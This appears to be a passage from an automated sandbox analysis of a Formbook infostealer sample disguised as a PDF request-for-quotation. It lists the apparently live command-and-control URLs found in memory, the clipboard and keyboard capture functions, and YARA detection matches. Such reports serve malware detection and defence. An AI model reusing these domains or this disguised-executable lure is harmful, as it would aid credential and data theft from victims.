          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.86339.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.91uvq.pro
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.91uvq.pro/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.91uvq.pro/hwu6/www.maheshg.xyz
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.91uvq.proReferer:
          Source: explorer.exe, 00000003.00000003.2980563020.000000000C3C4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2979678355.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980460373.000000000C35C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980802198.000000000C40D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.backstretch.store
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.backstretch.store/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.backstretch.store/hwu6/www.health-insurance-cake.world
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.backstretch.storeReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.d66dr114gl.bond
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.d66dr114gl.bond/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.d66dr114gl.bond/hwu6/www.ozzd86fih4.online
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.d66dr114gl.bondReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gequiltdesins.shop
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gequiltdesins.shop/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gequiltdesins.shop/hwu6/www.backstretch.store
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gequiltdesins.shopReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hair-transplantation-65829.bond
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hair-transplantation-65829.bond/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hair-transplantation-65829.bond/hwu6/www.gequiltdesins.shop
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hair-transplantation-65829.bondReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.health-insurance-cake.world
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.health-insurance-cake.world/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.health-insurance-cake.world/hwu6/www.vibrantsoul.xyz
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.health-insurance-cake.worldReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilsgroup.net
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilsgroup.net/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilsgroup.net/hwu6/www.7b5846.online
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilsgroup.netReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyz
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyz/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyz/hwu6/www.hair-transplantation-65829.bond
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.moocatinght.top
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.moocatinght.top/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.moocatinght.top/hwu6/www.suv-deals-49508.bond
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.moocatinght.topReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.online
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.online/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.online/hwu6/www.piedmontcsb.info
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.onlineReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piedmontcsb.info
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piedmontcsb.info/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piedmontcsb.info/hwu6/www.moocatinght.top
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piedmontcsb.infoReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simo1simo001.click
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simo1simo001.click/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simo1simo001.click/hwu6/www.ilsgroup.net
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simo1simo001.clickReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bond
          Source: explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bond/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bondReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/www.86339.xyz
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyzReferer:
          Source: explorer.exe, 00000003.00000002.4782465999.000000001111F000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4771639384.0000000003EFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://301.gn301.com:4500/?u=
          Source: explorer.exe, 00000003.00000003.2979322118.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348802491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 00000003.00000002.4780167257.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000002.4776588202.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000002.4776588202.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000002.4776588202.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00ABEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00ABEAFF
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00ABED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00ABED6A
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00AAAA57
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AD9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00AD9576

          E-Banking Fraud

          Source: Yara matchFile source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
